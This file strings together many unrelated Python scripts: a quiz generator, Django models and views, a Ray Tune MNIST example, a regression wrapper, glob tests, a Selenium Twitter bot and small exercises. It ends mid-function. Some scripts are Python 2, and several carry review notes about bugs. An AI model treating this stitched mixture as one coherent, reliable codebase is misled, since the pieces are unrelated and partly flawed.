d = None
str_a = None
int_a = None
dic = None
_2 = None
_3 = None
_3_idx = None
_3_decision = None
_4 = None
_4_decision = None
_5 = None
pt_u = "ú".encode('utf8').decode('iso-8859-1')
pt_numeros = 'n' + pt_u + 'meros'
def make_transformations():
    """Randomise the identifiers and literal values used in the question
    program and in the LaTeX answer placeholders.

    The chosen names/values are stored in module-level globals so that
    make_transformations_on_results() can reuse them afterwards.
    """
    global a
    global d
    global str_a
    global int_a
    global dic
    global _2
    global _3_decision
    global _4
    global _4_decision
    global _5
    # question
    _135 = str(randint(1000000, 2000000))           # random seed literal
    # five distinct one-letter identifiers
    [a, n, x, d, dic] = sample(string.ascii_lowercase, 5)
    _13 = randint(19000, 20000)                     # list length
    # NOTE(review): _3 is assigned here but NOT declared global in this
    # function, so this binding is local; the global _3 is set later in
    # make_transformations_on_results().  Confirm this is intended.
    _3 = randint(0, 5)                              # min int value
    _33 = randint(_3, 500)                          # max int value
    str_a = 'str_' + a
    int_a = 'int_' + a
    change_all_occurrences('135', _135)
    change_token_all_occurrences('a', a)
    change_token_all_occurrences('n', n)
    change_token_all_occurrences('x', x)
    change_token_all_occurrences('d', d)
    change_token_all_occurrences('dic', dic)
    change_token_all_occurrences('str_a', str_a)
    change_token_all_occurrences('int_a', int_a)
    change_all_occurrences('13', str(_13))
    change_all_occurrences('3', str(_3))
    change_all_occurrences('33', str(_33))
    # answers
    change_all_occurrences(r'\verb+a+', r'\verb+' + a + '+')
    change_all_occurrences(r'\verb+d+', r'\verb+' + d + '+')
    change_all_occurrences(r'\verb+dic+', r'\verb+' + dic + '+')
    # indexes with no repetitions
    _2 = choice((d, str_a, int_a, a))
    _3_decision = choice(("int", "float", "str"))
    _4 = choice(ascii_letters)
    _5 = choice(("maior", "menor"))
    change_all_occurrences(r'\verb+2+', r'\verb+' + _2 + '+')
    change_all_occurrences(r'\verb+4+', r'\verb+' + _4 + '+')
    change_all_occurrences(r'\verb+4_t+', r'\verb+"' + _4 + '"+')
    # randomly quote (or not) the wrong-answer variant of _4
    _4_decision = choice((0, 1))
    if _4_decision == 0:
        change_all_occurrences(r'\verb+4_f+', r'\verb+"' + _4 + '"+')
    else:
        change_all_occurrences(r'\verb+4_f+', r'\verb+' + _4 + '+')
    change_all_occurrences(r'\verb+5+', r'\verb+' + _5 + '+')
def make_transformations_on_results(program):
    """Fill in the true and false answer placeholders, using the values the
    question program computed at run time (read back through `program`).

    Must run after make_transformations(); relies on the globals it set.
    """
    # The `global` declarations here are not strictly needed because this
    # function does not assign to most of these names.  They only make it
    # explicit that these are shared module-level variables.
    global a
    global d
    global str_a
    global int_a
    global dic
    global _2
    global _3
    global _3_idx
    global _3_decision
    global _4
    global _4_decision
    global _5
    # read the program's computed values back out of its global namespace
    the_list = program.get_global(a)
    str_the_list = program.get_global(str_a)
    int_the_list = program.get_global(int_a)
    the_dic = program.get_global(dic)
    the_dict = program.get_global(d)
    # pick a dictionary key and type-cast the answer per _3_decision
    _3_idx = choice(ascii_letters)
    _3 = the_dic[_3_idx][0] if _3_decision == 'int' else the_dic[_3_idx] * 1.0 \
        if _3_decision == 'float' else _3_idx
    # answer index
    change_all_occurrences(r'\verb+3+', r'\verb+' + str(_3) + '+')
    # answer values
    dic_val = the_dic[_4][0]
    change_all_occurrences(r'\verb+dic_val+', r'\verb+' + str(dic_val) + '+')
    add_val = randint(7, 500)
    change_all_occurrences(r'\verb+add_val+', r'\verb+' + str(add_val) + '+')
    # build the true answers from the program's actual data
    answer_1_1_true = "letras" if len(str_the_list) > len(int_the_list) else pt_numeros
    answer_1_2_true = pt_numeros if answer_1_1_true == "letras" else "letras"
    answer_2_true = "tamanho maior" if len(d) > len(_2) else "tamanho menor" \
        if len(d) < len(_2) else "tamanho igual"
    answer_3_true = the_dic[_3][0]
    answer_4_true = 'o valor ' + str(add_val)
    answer_5_true = get_max_key(the_dict) if _5 == "maior" else get_min_key(the_dict)
    # true answers
    change_all_occurrences(r'\verb+11_1+', str(answer_1_1_true))
    change_all_occurrences(r'\verb+11_2+', str(answer_1_2_true))
    change_all_occurrences(r'\verb+22+', str(answer_2_true))
    change_all_occurrences(r'\verb+33+', str(answer_3_true))
    change_all_occurrences(r'\verb+44+', str(answer_4_true))
    change_all_occurrences(r'\verb+55+', str(answer_5_true))
    # wrong answers: each one contradicts its true counterpart
    increment4 = choice([1, -1])
    increment5 = choice([1, -1])
    answer_1_1_false = pt_numeros if answer_1_1_true == "letras" else "letras"
    answer_1_2_false = "letras" if answer_1_1_true == "letras" else pt_numeros
    answer_2_false = choice(("tamanho maior", "tamanho menor")) \
        if answer_2_true == "tamanho igual" else \
        "tamanho maior" if answer_2_true == "tamanho menor" \
        else "tamanho menor"
    answer_3_false = quest_3_false(answer_3_true)
    answer_4_false = 'os valores ' + str(add_val) + ' e ' + str(dic_val) \
        if _4_decision == 0 else 'o valor ' + str(add_val)
    answer_5_false = get_min_key(the_dict) if _5 == "maior" else get_max_key(the_dict)
    change_all_occurrences(r'\verb+111_1+', str(answer_1_1_false))
    change_all_occurrences(r'\verb+111_2+', str(answer_1_2_false))
    change_all_occurrences(r'\verb+222+', str(answer_2_false))
    change_all_occurrences(r'\verb+333+', str(answer_3_false))
    change_all_occurrences(r'\verb+444+', str(answer_4_false))
    change_all_occurrences(r'\verb+555+', str(answer_5_false))
def quest_3_false(true_answer):
    """Return a plausible wrong answer for question 3.

    "None" -> the chosen dictionary index; ints are nudged by one
    (down when positive, up otherwise); anything else gets a random
    letter different from the true answer.
    """
    if true_answer == "None":
        return _3_idx
    if isinstance(true_answer, int):
        return true_answer + (-1 if true_answer > 0 else 1)
    wrong = choice(ascii_letters)
    while wrong == true_answer:
        wrong = choice(ascii_letters)
    return wrong
def get_max_key(d):
    """Return the key of `d` whose value is largest."""
    return max(d.keys(), key=lambda k: d[k])
def get_min_key(d):
    """Return the key of `d` whose value is smallest."""
    return min(d.keys(), key=lambda k: d[k])
|
import os, struct, sys
def make_file_index(fname, idx_fname) :
    """Write a binary index for `fname`: one 8-byte unsigned entry per line
    holding the byte offset of that line's END, with the final entry (the
    EOF offset) overwritten by the total line count.

    Python 2 script: writes str data to a binary-mode file.
    """
    # open the original file normally, and the index file as a
    # binary file
    with open(fname,'r') as f_in, open(idx_fname,'wb') as f_out :
        # doing a normal iteration over the file lines
        # as in 'for line in f_in' will not work combined with
        # f_in.tell(). Therefore, we need to use this other way
        # of iterating over the file.
        # From https://stackoverflow.com/a/14145118/2312821
        lineno = 0
        for line in iter(f_in.readline, '') :
            # native-endian 8-byte offset of the end of this line
            f_out.write('%s'%(struct.pack("Q", f_in.tell())))
            lineno += 1
        # rewind over the last entry and replace it with the line count
        # NOTE(review): seeking back 8 bytes on an empty input raises --
        # assumes the file has at least one line; confirm.
        f_out.seek(-8, os.SEEK_CUR)
        f_out.write('%s'%(struct.pack("Q", lineno)))
# check for proper invocation (Python 2 script: print statement)
if len(sys.argv) < 3 :
    print "Usage: make_pbd_idx <pbd_fname> <idx_fname>"
    sys.exit(1)
# file names: input data file and output index file
pbd_fname = sys.argv[1]
idx_fname = sys.argv[2]
# now invoke the file indexing method
make_file_index(pbd_fname, idx_fname)
|
from argparse import ArgumentParser
from pymad import loadTrack, synthesize
from pymad.piano import loadDrum
if __name__ == "__main__":
    parser = ArgumentParser("drum", description="synthesis drum track")
    parser.add_argument("track", help="track path")
    parser.add_argument("output", help="output wav path")
    parser.add_argument("-o", "--orchestra", action="append", nargs=2, metavar=("id", "path"), help="add an orchestra")
    parser.add_argument("-v", "--volume", type=float, default=0, help="volume offset in dB")
    parser.add_argument("-s", "--speed", type=float, default=1, help="speed ratio")
    parser.add_argument("-q", "--quiet", action="store_true", help="suppress log output")
    args = parser.parse_args()
    # Map numeric orchestra id -> sample path.
    # BUG FIX: with no -o flags argparse leaves args.orchestra as None, which
    # the original loop crashed on; treat it as an empty list.
    drums = {}
    for drum_id, drum_path in args.orchestra or []:
        drums[int(drum_id)] = drum_path
    drum = loadDrum(drums)
    t = loadTrack(args.track)
    # NOTE(review): dB -> ratio uses 10**(dB/10) (a power ratio); confirm
    # synthesize() expects a power ratio rather than amplitude (dB/20).
    seq = synthesize(drum, t, speedRatio=args.speed, volRatio=10 ** (args.volume / 10), quiet=args.quiet)
    seq.writeWav(args.output)
|
# Demonstration of Python list methods on a mixed-type list.
a=['hello','I','am','ritu','soni','I','am','happy']
#append: adds one element at the end, in place
a.append(3)
print(a)
a.append(34)
a.append(4.45)
a.append(len(a))
a.append(True)
print(a)
x=a.append(56) #extend and append mutate in place and return None, so x is None
print(x)
#extend(iterable): appends every element of the iterable
b=[1,2]
x=a.extend(b)
print(x)
a.extend(b)
print(a)
#insert(index, value): inserts before the given index
a.insert(1,0)
print(a)
#remove: parameter = value that we want to remove (first occurrence only)
a.remove('hello')
a.remove(1)  # NOTE: True == 1 in Python, so this removes the earlier True, not a literal 1
a.remove(2)
#pop: parameter = index that we want to pop the element from.
x=a.pop(8)
print(x)
#pop removes the element from the list and returns it
print(a)
#a.clear() clears the whole list
#index(value, start): first position of value at or after `start`
v=a.index('ritu',2)
print(v)
#count(value): number of occurrences (True again counts as 1)
c=a.count(1)
print(c)
# can't sort a list with mixed str and int values via a.sort() (Python 3 raises TypeError)
a.reverse()
print(a)
c=a.copy()
print(c)
#slicing returns new lists; [:] is a shallow copy
z=[1,2,3,4,5,6]
print(z[-6:-3])
print(z[:])
|
from PowCapTools import ParseData
from PowCapTools import FindFile
def main():
    """One-off driver: locate a pair of captured power files by date/time and
    run ParseData over the first 20 seconds with a 200 ms window at 1 MS/s."""
    # NOTE(review): several of these presets are unused by the active
    # ParseData call below; kept as reference for the commented variants.
    fileName = '/home/henry/NeslStore/vikram/powcapData/Jason-Drive/mains_130313_030126-chan_1.dat'
    start_at_second = 1
    end_at_second = 20
    window_second = 200e-3
    sampRate = 1e6
    analysis = "plot"
    #fileCat = '/home/henry/Vikram_stuff/NASPOW/PowCapData/'
    fileCat = '/home/henry/Vikram_stuff/NASPOW/Data1/EX2-PowCapData/'
    #fileCat = '/home/henry/NeslStore/vikram/powcapData/Jason-Drive/'
    #fileCat = '/home/henry/Vikram_stuff/RAW_DATA/'
    year = '13'
    month = '04'
    day = '20'
    datestr = year+month+day
    hour = '11'
    minute = '15'
    second = '05'
    timestr = hour+minute+second
    f_search = FindFile(fileCat, datestr, timestr)
    # FindFile is expected to yield at least two matching paths (two channels)
    # -- TODO confirm against PowCapTools.FindFile.
    fileCatPath = [ fileCat + f_search.foundPath[0], fileCat + f_search.foundPath[1] ]
    #fileCatPath = [ fileCat + f_search.latestFiles[0], fileCat + f_search.latestFiles[1] ]
    p = ParseData(fileCatPath, 0, 20, window_second, sampRate)
    #p = ParseData(fileCatPath, 0, 20, window_second, sampRate, analysis)
    #p = ParseData(fileName, start_at_second, end_at_second, window_second)


# FIX: guard the entry point so importing this module no longer runs main().
if __name__ == '__main__':
    main()
|
from django.db import models
from django.contrib.auth.models import User
from shop.models import Product,Category
class Profile(models.Model):
    """Per-user account metadata, linked one-to-one with Django's User."""
    user = models.OneToOneField(User , on_delete=models.CASCADE)
    # auth token -- presumably used in verification emails; confirm with the views
    auth_token = models.CharField(max_length=100 )
    # NOTE(review): IntegerField drops leading zeros and can overflow on full
    # international numbers; CharField is the usual choice for phone numbers.
    phone=models.IntegerField(default=+917447650728)
    is_verified = models.BooleanField(default=False)
    forget_password_token = models.CharField(max_length=100,default='0')
    created_at = models.DateTimeField(auto_now_add=True)
    def __str__(self):
        return self.user.username
class Wishlist(models.Model):
    """One wished-for product per row, owned by a user."""
    # NOTE(review): AutoField values are assigned by the database, so the
    # default='999' is contradictory and should likely be removed.
    wish_id= models.AutoField(primary_key=True,default='999')
    user=models.ForeignKey(User,on_delete=models.CASCADE)
    # NOTE(review): unique=True means no two users can wish the same product
    # id -- confirm that is the intended constraint.
    wish_prod=models.CharField(max_length=250, unique=True,default='ads123')
class Contact(models.Model):
    """A contact-form submission (name, email, phone, free-text message)."""
    msg_id = models.AutoField(primary_key=True)
    name = models.CharField(max_length=50)
    email = models.CharField(max_length=70, default="")
    phone = models.CharField(max_length=70, default="")
    desc = models.CharField(max_length=1000, default="")
    def __str__(self):
        return self.name
|
# Original Code here:
# https://github.com/pytorch/examples/blob/master/mnist/main.py
import os
import argparse
from filelock import FileLock
import tempfile
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from torchvision import datasets, transforms
import ray
from ray import train, tune
from ray.train import Checkpoint
from ray.tune.schedulers import AsyncHyperBandScheduler
# Change these values if you want the training to run quicker or slower.
EPOCH_SIZE = 512
TEST_SIZE = 256
class ConvNet(nn.Module):
    """Tiny CNN for 28x28 MNIST digits: one conv layer plus a linear head."""

    def __init__(self):
        super(ConvNet, self).__init__()
        # 1 input channel -> 3 feature maps; a 28x28 image becomes 26x26
        # after the 3x3 conv and 8x8 after 3x3 max pooling: 3*8*8 = 192.
        self.conv1 = nn.Conv2d(1, 3, kernel_size=3)
        self.fc = nn.Linear(192, 10)

    def forward(self, x):
        features = F.relu(F.max_pool2d(self.conv1(x), 3))
        flat = features.view(-1, 192)
        logits = self.fc(flat)
        return F.log_softmax(logits, dim=1)
def train_func(model, optimizer, train_loader, device=None):
    """Run one capped training pass over `train_loader` (CPU by default)."""
    if device is None:
        device = torch.device("cpu")
    model.train()
    for step, (inputs, labels) in enumerate(train_loader):
        # Cap work per call (~EPOCH_SIZE samples) so tuning iterations stay short.
        if step * len(inputs) > EPOCH_SIZE:
            break
        inputs, labels = inputs.to(device), labels.to(device)
        optimizer.zero_grad()
        loss = F.nll_loss(model(inputs), labels)
        loss.backward()
        optimizer.step()
def test_func(model, data_loader, device=None):
    """Return accuracy over at most ~TEST_SIZE samples of `data_loader`."""
    if device is None:
        device = torch.device("cpu")
    model.eval()
    correct = 0
    total = 0
    with torch.no_grad():
        for step, (inputs, labels) in enumerate(data_loader):
            if step * len(inputs) > TEST_SIZE:
                break
            inputs, labels = inputs.to(device), labels.to(device)
            predictions = model(inputs).data.max(1)[1]
            total += labels.size(0)
            correct += (predictions == labels).sum().item()
    return correct / total
def get_data_loaders(batch_size=64):
    """Build shuffled MNIST train/test DataLoaders (downloads on first use)."""
    mnist_transforms = transforms.Compose(
        [transforms.ToTensor(), transforms.Normalize((0.1307,), (0.3081,))]
    )

    def _loader(train):
        # One shuffled loader over either the train or the test split.
        return torch.utils.data.DataLoader(
            datasets.MNIST(
                "~/data", train=train, download=True, transform=mnist_transforms
            ),
            batch_size=batch_size,
            shuffle=True,
        )

    # We add FileLock here because multiple workers will want to download
    # data, and this may cause overwrites since DataLoader is not threadsafe.
    with FileLock(os.path.expanduser("~/data.lock")):
        return _loader(True), _loader(False)
def train_mnist(config):
    """Tune trainable: train ConvNet indefinitely, reporting accuracy (and,
    optionally, a checkpoint) after every capped train/eval cycle."""
    should_checkpoint = config.get("should_checkpoint", False)
    use_cuda = torch.cuda.is_available()
    device = torch.device("cuda" if use_cuda else "cpu")
    train_loader, test_loader = get_data_loaders()
    model = ConvNet().to(device)
    optimizer = optim.SGD(
        model.parameters(), lr=config["lr"], momentum=config["momentum"]
    )
    while True:
        train_func(model, optimizer, train_loader, device)
        metrics = {"mean_accuracy": test_func(model, test_loader, device)}
        # Report metrics (and possibly a checkpoint).
        if not should_checkpoint:
            train.report(metrics)
            continue
        with tempfile.TemporaryDirectory() as tempdir:
            torch.save(model.state_dict(), os.path.join(tempdir, "model.pt"))
            train.report(metrics, checkpoint=Checkpoint.from_directory(tempdir))
if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="PyTorch MNIST Example")
    parser.add_argument(
        "--cuda", action="store_true", default=False, help="Enables GPU training"
    )
    parser.add_argument(
        "--smoke-test", action="store_true", help="Finish quickly for testing"
    )
    args, _ = parser.parse_known_args()
    # Smoke tests run on a tiny 2-CPU cluster; otherwise Ray autodetects.
    ray.init(num_cpus=2 if args.smoke_test else None)
    # for early stopping
    sched = AsyncHyperBandScheduler()
    resources_per_trial = {"cpu": 2, "gpu": int(args.cuda)}  # set this for GPUs
    tuner = tune.Tuner(
        tune.with_resources(train_mnist, resources=resources_per_trial),
        tune_config=tune.TuneConfig(
            metric="mean_accuracy",
            mode="max",
            scheduler=sched,
            num_samples=1 if args.smoke_test else 50,
        ),
        run_config=train.RunConfig(
            name="exp",
            # Stop a trial once it is accurate enough or has run long enough.
            stop={
                "mean_accuracy": 0.98,
                "training_iteration": 5 if args.smoke_test else 100,
            },
        ),
        # Search space sampled per trial.
        param_space={
            "lr": tune.loguniform(1e-4, 1e-2),
            "momentum": tune.uniform(0.1, 0.9),
        },
    )
    results = tuner.fit()
    print("Best config is:", results.get_best_result().config)
    # NOTE(review): assert runs after the success message and is stripped
    # under `python -O`; raise explicitly if trial errors must be fatal.
    assert not results.errors
|
if __name__ == "__main__":
    # Echo each line of the state-machine definition, separated by "next".
    # FIX: use a context manager so the file is closed even if printing fails.
    with open('stateMachine_1.txt', 'r') as filepointer:
        for line in filepointer:
            print(line)
            print("next")
|
'''
thin wrapper around sklearn classifiers, provide easy access and some additional model evaluation metrics
'''
import logging
import numpy as np
import scipy.stats
import scipy.sparse
from sklearn.linear_model import LogisticRegressionCV
class ModelTrainer(object):
    """Thin wrapper around sklearn's LogisticRegressionCV that also reports
    per-coefficient Wald statistics and p-values."""

    def __init__(self):
        self.model = None                  # fitted LogisticRegressionCV
        self.feature_name_coef_map = None  # name -> (coef, wald stat, p-value)

    def fit(self, feature_values, target_values, feature_names):
        """Fit an L2 logistic regression with 10-fold CV, then evaluate the
        significance of every coefficient. Returns self."""
        self.model = LogisticRegressionCV(penalty = "l2", max_iter = 200, cv = 10, class_weight = "balanced")
        logging.info("start train logistic regression model with 10-fold cross validation")
        self.model.fit(feature_values, target_values)
        logging.info("train model finished, start evaluate model coefficients")
        self.eval_model_coef(feature_values, feature_names)
        return self

    def eval_model_coef(self, feature_values, feature_names):
        """Record (coefficient, Wald statistic, p-value) per feature.

        BUG FIX: a Wald-test p-value is the chi-square(1) survival function
        of the squared z statistic, not the pdf of the Wald (inverse
        Gaussian) distribution as the original code computed.
        """
        self.feature_name_coef_map = dict()
        wald_stat = self.wald_test(feature_values)
        w = wald_stat[0]
        p_value = scipy.stats.chi2.sf(w, 1)
        self.feature_name_coef_map["Intercept"] = (self.model.intercept_[0], w, p_value)
        logging.info("Intercept: %f, wald: %f, p_value: %f" % (self.model.intercept_[0], w, p_value))
        for idx in range(len(feature_names)):
            coef = self.model.coef_[0][idx]
            w = wald_stat[idx + 1]
            p_value = scipy.stats.chi2.sf(w, 1)
            self.feature_name_coef_map[feature_names[idx]] = (coef, w, p_value)
            logging.info("%s: %f, wald: %f, p_value: %f" % (feature_names[idx], coef, w, p_value))

    def predict(self, feature_values):
        """Class predictions, or None if the model has not been fit."""
        if self.model is None:
            return None
        return self.model.predict(feature_values)

    def predict_proba(self, feature_values):
        """Positive-class probabilities, or None if the model has not been fit."""
        if self.model is None:
            return None
        proba = self.model.predict_proba(feature_values)
        proba = proba[:, 1]
        return proba

    def get_feature_coef_map(self):
        return self.feature_name_coef_map

    def wald_test(self, X):
        """Squared z statistics (intercept first): w_i = beta_i^2 / Var(beta_i),
        with variances from the inverse observed information matrix."""
        if self.model is None:
            return
        pred_probs = np.matrix(self.model.predict_proba(X))
        X_design = np.hstack((np.ones(shape = (X.shape[0], 1)), X))
        # p*(1-p) per sample: the Bernoulli variance terms of the information matrix.
        diag_array = np.multiply(pred_probs[:, 0], pred_probs[:, 1]).A1
        V = scipy.sparse.diags(diag_array)
        m1 = X_design.T * V
        m2 = m1.dot(X_design)
        cov_mat = np.linalg.inv(m2)  # covariance of (intercept, coefs)
        model_params = np.hstack((self.model.intercept_[0], self.model.coef_[0]))
        wald_stats = (model_params / np.sqrt(np.diag(cov_mat))) ** 2
        return wald_stats
#https://www.hackerrank.com/challenges/game-of-thrones/problem
#!/bin/python3
import math
import os
import random
import re
import sys
def gameOfThrones(s):
    """Return "YES" if some anagram of s is a palindrome, else "NO".

    An anagram of s can be a palindrome exactly when at most one character
    occurs an odd number of times.
    """
    odd_counts = sum(s.count(ch) % 2 for ch in set(s))
    return "YES" if odd_counts <= 1 else "NO"
if __name__ == '__main__':
    # HackerRank harness: read s from stdin, write the answer to OUTPUT_PATH.
    with open(os.environ['OUTPUT_PATH'], 'w') as out_file:
        answer = gameOfThrones(input())
        out_file.write(answer + '\n')
# Copyright 2017 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from typing import Tuple
from pants.engine.fs import PathGlobs, Snapshot
from pants.source.filespec import matches_filespec
from pants.testutil.test_base import TestBase
class FilespecTest(TestBase):
    """Checks that the in-memory glob matcher (`matches_filespec`) agrees with
    the engine's on-disk `PathGlobs` matching for a variety of patterns."""
    def assert_rule_match(
        self, glob: str, paths: Tuple[str, ...], *, should_match: bool = True
    ) -> None:
        """Assert `glob` matches (or rejects) every path in `paths`, both via
        the in-memory filespec matcher and via an on-disk snapshot."""
        # Confirm in-memory behavior.
        matched_filespec = matches_filespec({"includes": [glob]}, paths=paths)
        if should_match:
            assert matched_filespec == paths
        else:
            assert not matched_filespec
        # Confirm on-disk behavior: materialize each path (a trailing slash
        # means a directory), then snapshot the glob and compare file sets.
        for expected_match in paths:
            if expected_match.endswith("/"):
                self.create_dir(expected_match)
            else:
                self.create_file(expected_match)
        snapshot = self.request_single_product(Snapshot, PathGlobs([glob]))
        if should_match:
            assert sorted(paths) == sorted(snapshot.files)
        else:
            assert not snapshot.files
    # `*` matches exactly one path segment.
    def test_matches_single_star_0(self) -> None:
        self.assert_rule_match("a/b/*/f.py", ("a/b/c/f.py", "a/b/q/f.py"))
    def test_matches_single_star_0_neg(self) -> None:
        self.assert_rule_match("a/b/*/f.py", ("a/b/c/d/f.py", "a/b/f.py"), should_match=False)
    def test_matches_single_star_1(self) -> None:
        self.assert_rule_match("foo/bar/*", ("foo/bar/baz", "foo/bar/bar"))
    def test_matches_single_star_2(self) -> None:
        self.assert_rule_match("*/bar/b*", ("foo/bar/baz", "foo/bar/bar"))
    def test_matches_single_star_2_neg(self) -> None:
        self.assert_rule_match(
            "*/bar/b*", ("foo/koo/bar/baz", "foo/bar/bar/zoo"), should_match=False
        )
    def test_matches_single_star_3(self) -> None:
        self.assert_rule_match("*/[be]*/b*", ("foo/bar/baz", "foo/bar/bar"))
    def test_matches_single_star_4(self) -> None:
        self.assert_rule_match("foo*/bar", ("foofighters/bar", "foofighters.venv/bar"))
    def test_matches_single_star_4_neg(self) -> None:
        self.assert_rule_match("foo*/bar", ("foofighters/baz/bar",), should_match=False)
    # `**` matches any number of segments (but not the bare parent itself).
    def test_matches_double_star_0(self) -> None:
        self.assert_rule_match("**", ("a/b/c", "b"))
    def test_matches_double_star_1(self) -> None:
        self.assert_rule_match("a/**/f", ("a/f", "a/b/c/d/e/f"))
    def test_matches_double_star_2(self) -> None:
        self.assert_rule_match("a/b/**", ("a/b/d", "a/b/c/d/e/f"))
    def test_matches_double_star_2_neg(self) -> None:
        self.assert_rule_match("a/b/**", ("a/b",), should_match=False)
    # Leading-dot (hidden) entries.
    def test_matches_dots(self) -> None:
        self.assert_rule_match(".*", (".dots", ".dips"))
    def test_matches_dots_relative(self) -> None:
        self.assert_rule_match("./*.py", ("f.py", "g.py"))
    def test_matches_dots_neg(self) -> None:
        self.assert_rule_match(
            ".*",
            (
                "b",
                "a/non/dot/dir/file.py",
                "dist",
                "all/nested/.dot",
                ".some/hidden/nested/dir/file.py",
            ),
            should_match=False,
        )
    # A trailing slash restricts the glob to directories.
    def test_matches_dirs(self) -> None:
        self.assert_rule_match("dist/", ("dist",))
    def test_matches_dirs_neg(self) -> None:
        self.assert_rule_match(
            "dist/", ("not_dist", "cdist", "dist.py", "dist/dist"), should_match=False
        )
    def test_matches_dirs_dots(self) -> None:
        self.assert_rule_match(
            "build-support/*.venv/", ("build-support/blah.venv", "build-support/rbt.venv")
        )
    def test_matches_dirs_dots_neg(self) -> None:
        self.assert_rule_match(
            "build-support/*.venv/",
            ("build-support/rbt.venv.but_actually_a_file",),
            should_match=False,
        )
    # Literal (glob-free) patterns.
    def test_matches_literals(self) -> None:
        self.assert_rule_match("a", ("a",))
    def test_matches_literal_dir(self) -> None:
        self.assert_rule_match("a/b/c", ("a/b/c",))
    def test_matches_literal_file(self) -> None:
        self.assert_rule_match("a/b/c.py", ("a/b/c.py",))
|
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
import time
class TwitterBot:
    """Minimal Selenium bot that logs into Twitter and scans tweets by hashtag."""

    def __init__(self, username, password):
        self.username = username
        self.password = password
        self.bot = webdriver.Firefox()

    def login(self):
        """Open twitter.com and submit the login form."""
        bot = self.bot
        bot.get("https://twitter.com/")
        time.sleep(2)
        # NOTE(review): these locators target an old Twitter login page and
        # probably need updating against the current markup.
        email = bot.find_element_by_class_name("email-input")
        password = bot.find_element_by_name("session[password]")
        email.clear()
        password.clear()
        email.send_keys(self.username)
        password.send_keys(self.password)
        password.send_keys(Keys.RETURN)
        time.sleep(3)

    def like_tweet(self, hashtag):
        """Search for `hashtag` and scroll the results, collecting tweet nodes."""
        bot = self.bot
        bot.get("https://twitter.com/search?q=" + hashtag + "&src=typeahead_click")
        time.sleep(4)
        for i in range(1, 5):
            bot.execute_script("window.scrollTo(0,document.body.scrollHeight)")
            time.sleep(2)
            # BUG FIX: find_elements_by_class_name takes a single class name;
            # the original passed a space-separated list, which never matches.
            # A CSS selector requiring all three classes does the same intent.
            tweets = bot.find_elements_by_css_selector(".css-1dbjc4n.r-18u37iz.r-thb0q2")
            ##data-testid="tweet"
# 5x5 sliding-tile puzzle solver (Python 2: uses raw_input alongside input).
# Reads a 5-line board containing one space (the hole), a line of moves
# (A=up, B=down, R=right, L=left), applies them, and prints the result.
l = []
matrix = []
g = int(input("enter puzzleno:"))
print("enter puzzle")
for i in range(0,5):
    l = list(raw_input())
    matrix.append(l)
x = []
p = []
m = ' '  # the hole is represented by a single space character
print("enter operations")
for y in range(0,1):
    p = list(raw_input())
# Locate the hole: (e, c) = row/column of the blank cell.
for j in range(0,5):
    for t in range(0,5):
        if matrix[j][t] == m:
            e = j
            c = t
# Rough validity check: an 'R' move while the hole sits in the last column
# would leave the board, so flag such inputs as unsolvable.
# NOTE(review): this re-checks only the hole's *initial* column, not its
# position at the time each move is applied -- confirm intended behavior.
ve = 0
for x2 in range(0,len(p)):
    for x1 in range(0,5):
        if matrix[x1][4] == ' ':
            if p[x2] == 'R':
                ve+=1
if ve>=1:
    print("this puzzle has no configuration")
else:
    # Apply each move by swapping the hole with its neighbor and
    # updating the hole coordinates.
    for u in range(0,len(p)):
        if p[u] == 'A':
            temp = matrix[e][c]
            matrix[e][c] = matrix[e-1][c]
            matrix[e-1][c] = temp
            e = e - 1
        if p[u] == 'B':
            temp = matrix[e][c]
            matrix[e][c] = matrix[e+1][c]
            matrix[e+1][c] = temp
            e = e + 1
        if p[u] == 'R':
            temp = matrix[e][c]
            matrix[e][c] = matrix[e][c+1]
            matrix[e][c+1] = temp
            c = c + 1
        if p[u] == 'L':
            temp = matrix[e][c]
            matrix[e][c] = matrix[e][c-1]
            matrix[e][c-1] = temp
            c = c - 1
    # Print the final board, one space-joined row per line.
    print("puzzle #:{}".format(g))
    for f in range(0,5):
        z = matrix[f]
        s = ' '
        print(s.join(z))
|
# Precompute factorials 0!..100! so each query is an O(1) lookup.
fac = [1]
n = 1
for x in range(1, 101):
    n *= x
    fac.append(n)
# Python 2 I/O: first line is the query count, then one integer per line.
for _ in range(int(raw_input())):
    print fac[int(raw_input())]
|
'''
Created on 2020. 2. 10.
@author: gd7
learnex1.py : machine-learning example -- using the scikit-learn toolkit
'''
from sklearn import svm #pip install sklearn
# XOR truth table: [p, q, p XOR q]
xor_data = [[0,0,0],[0,1,1],[1,0,1],[1,1,0]]
data = [] # sample inputs
label = [] # expected outputs
# build the training samples
for row in xor_data :
    p = row[0]
    q = row[1]
    r = row[2]
    data.append([p,q])
    label.append(r)
clf = svm.SVC() # estimator object for machine learning
clf.fit(data,label) # train the model
# build data for evaluation
sample_data = [[1,1],[1,0],[0,1],[1,1],[1,0],[0,0]]
# evaluate. pre: the model's predicted answers
pre = clf.predict(sample_data)
ans = [0,1,1,0,1,0] # answer key
print("예측 결과 :",pre)
# score the predictions against the answer key
ok = 0
total = 0
for idx,answer in enumerate(ans) :
    p = pre[idx]
    if p == answer :
        ok += 1
    total += 1
print("정답률",ok,"/",total,"=",ok/total)
from django.shortcuts import render, redirect, get_object_or_404,HttpResponse
from .form import DreamrealForm
from .models import book
def index(request):
    """Render the landing page."""
    return render(request, 'index.html')
def save_book1(request):
    """Create a `book` row from query-string parameters and report the result.

    NOTE(review): a state-changing save driven by GET is unconventional (and
    a missing parameter raises before the try); consider moving to POST.
    """
    b_name = request.GET['name']
    b_price = request.GET['price']
    n_pages = request.GET['pages']
    s_book = book(book_name=b_name, book_price=b_price, no_pages=n_pages)
    try:
        s_book.save()
        return HttpResponse('success')
    except Exception:  # FIX: bare except also swallowed SystemExit/KeyboardInterrupt
        return HttpResponse("error... ")
# def dreamreal(request):
# # form = DreamrealForm()
# return render(request, 'dreamreal.html')
# def create(request):
# if request.method == 'POST':
# form = DreamrealForm(request.POST)
# if form.is_valid():
# print('load')
# form.save()
# # this method will add a record in the table
# return redirect('index')
# else:
# print('error')
# form = DreamrealForm()
# return render(request, 'dreamreal1.html', {'form': form})
def create(request):
    """On POST, validate and persist a DreamrealForm; otherwise show a blank form."""
    if request.method != 'POST':
        form = DreamrealForm()
        return render(request, 'dreamreal1.html', {'form': form})
    form = DreamrealForm(request.POST)
    if not form.is_valid():
